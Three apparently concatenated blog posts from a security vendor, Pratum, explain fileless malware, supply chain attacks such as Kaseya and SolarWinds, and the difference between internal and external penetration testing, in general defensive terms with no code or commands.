Every ransomware update you’ll hear right now includes discussion of a growing threat that goes by multiple names. Fileless malware. Living-off-the-land attacks. Memory-based attacks. Non-malware attacks.
Whatever you call it, the fileless malware threat is growing and extremely evasive—but you can mount a meaningful defense. In this blog, we talk with Pratum Senior Penetration Tester Jason Moulder about the growing issue of fileless malware attacks, how they work and how you can create an effective defense against this slippery enemy.
Fileless malware attacks give almost no sign of entry and leave almost no evidence in their wake. If a data breach were a physical burglary, a fileless malware attack would look something like arriving at your office to find the company’s secret formula missing from the vault. Yet there’s no sign of a broken lock, overturned furniture or even a footprint in the carpet. The bad guys seem to have materialized in the vault and evaporated with the goods just as mysteriously. The reality, however, is that they somehow convinced one of your trusted employees to steal the formula using their approved access to the vault.
In the same way, fileless malware attacks without introducing a foreign file into your system. It sneaks into legitimate operating system processes (especially Windows PowerShell) and works against you. That makes it extremely hard to detect through traditional antivirus software, which works by looking for known file signatures.
This hacking technique has been surging lately, as fileless malware attacks jumped 900% in 2020, according to one report. One study found that 74% of malware attacks in Q1 2021 were zero-day attacks, which includes any attack that doesn’t shown up in the databases of signature-scanning tools.
Because these attacks leverage scripts within your legitimate software to launch their attacks, they’re a bit like a digital cancer, with hackers turning the system’s own elements against it. With no file installation to detect, antivirus programs usually can’t see them. And because the fileless malware exploits trusted applications or the operating system itself, whitelisting apps you consider dangerous won’t do any good. The most common vectors in fileless attacks are scripts that exploit Windows’ PowerShell, accounting for up to 90% of fileless attacks in some studies. Hackers also frequently leverage Windows Remote Management (WinRM) in fileless attacks.
Pratum Senior Penetration Tester Jason Moulder, who spends his days getting inside hackers’ minds, calls fileless malware one of the most elusive threats in play. “If you were to scan all the communication between all the APIs in your system every day, you’re looking at an incredible amount of data. If you look at your Task Manager, you’ll see certain elements running 50 times simultaneously because it’s used by multiple programs. That’s what makes fileless malware such a great attack avenue. The malicious activity gets lost inside the normal activities that make your operating system function.”
Digital forensics investigations struggle to analyze how attacks happened because the malicious script runs in memory and disappears after the system restarts.
Hackers also like this form of attack because it gives them admin access to an endpoint, letting them exploit it as a gateway to the rest of the network.
The security community has identified scores of binaries, scripts and libraries that hackers use in fileless attacks. (You can browse a list here.) Here are some of the most common ways that hackers get a foot in the door for these attacks:
PDFs – The issue with this ubiquitous file type typically revolves around opening PDFs in the web browser by default, which triggers one of the scripts hackers seek to exploit by blending their code into legitimate processes. “For example,” Jason says, “you can write something for PowerShell that says, ‘When you open this, open this command in the background and go get this file from the Internet.’ Whenever it goes to this website, that site can load something into memory.”
Microsoft Office macros – Similarly, Office macros run scripts that give hackers a chance to piggyback with their own malicious scripts. In response, Office now automatically blocks most macros. But Jason warns, “You can still trick people into enabling the macro. It may require some limited user action to initiate it, especially if it’s a Word doc or a PDF. When they click it to open it, that part is written to disk and can be seen in forensics. But once it’s loaded into memory, that’s where it can get lost pretty quickly.”
Security leaders engage in a daily arms race with hackers as each side counters new moves by the other. While fileless malware presents a serious threat, you can actively defend against it with the following steps.
Implement managed XDR – A managed XDR service like Pratum’s provides complete monitoring across your entire system through SIEM, endpoint detection and response and 24/7 SOC analysts interpreting the alerts that come in. Managed XDR spots suspicious activity and correlates signals to form a picture of a developing threat, even when it’s caused by something other than a known malicious file.
Jason points to the following indicators that XDR can pick up as the sign of a brewing fileless malware attack:
Limit user access – Many fileless malware attacks target users with wide-ranging network access, using compromised credentials to pivot throughout the system. By limiting users to only the data they really need (as described here), you can limit hackers’ ability to move laterally if they get in.
Jason calls specific attention to admin accounts. “Using the default admin built into Windows is a very bad habit because once you have that account, you can go pretty much anywhere,” he says.
Train employees – This advice never goes out of style. Teaching employees to recognize and avoid suspicious links will greatly reduce your risk by preventing malicious scripts from ever getting the chance to scan a device and go to work.
For advice about you can protect your specific system from the ever-changing fileless malware threat, contact Pratum today.
One of 2021’s biggest cybersecurity storylines has been the jump in supply chain attacks. (They’ve jumped fourfold this year in some reports.) These attacks turn the breach of a single organization into a massive headache for hundreds of partner companies. One of the most famous examples was the breach of Kaseya in July. That attack eventually enabled the REvil ransomware organization to encrypt the data of hundreds of companies worldwide as the attack cascaded outward from Kaseya to managed service providers (MSPs) to small/medium-size businesses. In a supply chain attack, the threat comes from one of your trusted software providers who hackers turn into a Trojan horse before anyone realizes what’s happening.
In this post, we’ll break down how supply chain attacks happen and what you can do to protect your system from these threats that arrive when your most trusted vendors unknowingly pass a big problem along to you.
In what you might think of as a traditional hack, threat actors target one company and conduct reconnaissance to find vulnerabilities they can exploit. Then the threat actor breaks into that specific victim's computer network to exfiltrate data, launch ransomware, etc.
During a supply chain attack, the threat actors take the same initial steps, but their focus is upstream. They will compromise and infiltrate a trusted vendor that supplies software or IT services to many other companies. In this kind of attack, the goal isn’t focused on data exfiltration or launching ransomware on the vendors’ systems. Rather, hackers intend to sneak malware into the “supply chain” of software updates that the company installs on its customers’ computers. From a hacker’s perspective, these attacks are more efficient and have a greater impact because they leverage IT vendors that already have established and authorized connections into their customers’ network and systems. That means the malware can deploy across hundreds of companies and systems virtually undetected.
Every client of the IT vendor under attack becomes part of the attack. This blows up the “security by obscurity” belief that many smaller companies adopt. They think that because they’re small, they won’t be targeted by threat actors. But with supply chain attacks, tiny companies face just as much risk as big, high-profile enterprises.
To understand these attacks, let’s break down the famous 2021 breach of Kaseya, an IT management software provider that mainly serves MSPs. On Friday, July 2, Kaseya’s incident response team identified a security incident related to Kaseya VSA. Their VSA (Virtual System Administrator) product delivers automated software patching, remote monitoring, and other capabilities so MSPs can seamlessly manage their customers' IT infrastructure. After breaking into Kaseya, the threat actors infected 50-60 MSPs. From there, they infected approximately 1,500 of the MSPs’ clients. The threat actors encrypted the victims’ data, effectively shutting down systems and networks. In Sweden, for example, the supermarket chain Coop closed 800 stores when its cash registers and payment processing systems went down—all because of a breach that was originally two steps removed from Coop’s systems.
The threat actors initially demanded $70 million to decrypt the systems, but later lowered the demand to $50 million. It appears that Kaseya refused to pay the ransom and received a decryptor tool from a third party on July 21 (yes, that’s nearly three weeks after the problem was discovered). With this tool, Kaseya was able to assist victims in restoring their systems and networks.
The SolarWinds breach that dominated headlines in December 2020 was another supply chain attack. Russian hackers, working for the Russian government, injected malicious code into SolarWinds’ IT management tool Orion, which gave the attackers access to thousands of systems when it was deployed. SolarWinds reported that up to 18,000 clients had installed the update with that malicious code. The victims of this attack included both private companies and government agencies, including NASA, the State Department, the Department of Defense, and the Department of Justice. The hackers didn’t demand a ransom, which indicates that this attack focused on espionage.
Supply chain attacks are hard to defend against because they use software updates from trusted vendors. Organizations have always been concerned about infections that come from employees opening phishing e-mails with malicious attachments; clicking links and revealing their login credentials; or plugging a virus-infected USB drive into their computer. Today though, companies must also focus on creating defenses that screen the IT software and service providers who have authorized access into their network.
Threat actors increasingly use supply chain attacks for several reasons:
To mitigate the risk of supply chain attacks, we recommend the following steps:
Pratum’s team can help you create a thorough defense strategy that protects your operations even when threats arrive from your trusted partners. Contact us for a free consultation.
Regular penetration testing provides a key pillar in your ongoing cybersecurity plans. But penetration tests come in a lot of forms, and vendors often put their own spin on describing their work. In simple terms, penetration testing involves a team of ethical hackers proactively looking for exploitable vulnerabilities in your web applications, computer systems and networks. Their job is to identify your security gaps before a hacker does and compromises your system.
To ensure you’re picking a pen test that meets your needs, use this blog to understand the purpose and value of internal penetration testing and external penetration testing. Attacks can come from any direction, so your testing has to probe for weaknesses that come from outside and inside your environment.
This tests security programs by looking at anything with external access, including any device with a public-facing service, IP or URL such as a web application, firewall, server or IoT device. A pen tester may also try to gain access to external-facing assets such as e-mail, file shares, or websites. The pen testers simulate the work of an attacker who, depending on their motivation, may utilize a vulnerability or chain multiple vulnerabilities together in order to gain access to sensitive data. In various parts of the Internet, hackers sell or trade information on zero-day exploits (those not listed in known vulnerability databases) for these purposes.
External pen testing methods include:
During the process, a pen tester gathers information on open ports, vulnerabilities, and the company’s users. Then they attempt to leverage that information for various attacks such as brute forcing passwords, phishing attacks, and precise operating system and service attacks.
The external pen test should reveal any areas that may be compromised and exploited to gain access to your network. The organization should also use the pen test as an opportunity to verify their current process for detecting anomalous activity. In other words, did your defenses pick up what the pen tester was trying to do and stop them?
Once a perimeter is breached, a given pen test’s rules of engagement may allow for using further attacks to gain access to internal network assets, often referred to as pivoting or lateral movement.
Most organizations focus on the perimeter in their security work. But the fact is that those with direct access to an organization’s data pose the most significant threat overall. People (even well-intentioned ones) are often easily manipulated and prone to mistakes. Many times, what happens at the host level goes unmonitored, and many organizations aren’t aware of what is entering or leaving their networks. Many common misconfigurations lead to full network compromise. All of that makes internal pen testing a critical part of your security strategy, even if your external pen testing seemed secure.
If your business has a file sharing system without a password, for example, you should re-evaluate who has access to various levels of content. Not every employee needs access to the same data, and unnecessary access could leave you vulnerable to an attack, whether by an employee with malicious intent or a loyal employee who unknowingly gives their login credentials to a hacker.
The expansion of work-from-home policies has created a new range of internal vulnerabilities to test. That may be private networks such as home WiFi, smartphones, cable and streaming services. Connecting your organization’s network to any of those channels could open it up to external threats.
A threat actor who manages to get in through one of these channels rarely attacks right away. They may move about and gather private data by observing from within. During this quiet period, they may collect data to use later or sell to others. Hackers could lurk in your system for weeks, months or longer if proper internal auditing, patching and testing are not performed on a regular basis. An IBM study shows that, on average, American companies take 186 days to detect a data breach and another 51 days to fully contain it. A breach of Starwood Hotels discovered in 2018 had gone undetected for four years.
During internal pen testing, the assessor tries to find out just how much damage a threat actor or employee could do from the inside the network. A poorly secured domain could lead to total control of a network, but most tests require multiple attack paths to complete the objective. Hackers often pull this off by exploiting relaxed policies that focus on convenience rather than necessary mitigations.
The tester will often use less important, easier-to-compromise systems as a channel for getting to more secure areas with higher levels of protection and more sensitive data and controls. Internal pen testing can also include privilege escalation, malware spreading, information leakage and other malicious activities.
Internal Pen Testing methods include:
Choosing the right security path for your business is not always simple, and there is no “standard” penetration test that works for every organization. No matter how large or small your organization, Pratum can customize a solution that provides value to your organization.
If you’re interested in learning more about the type of pen test that will work best for you, contact Pratum today.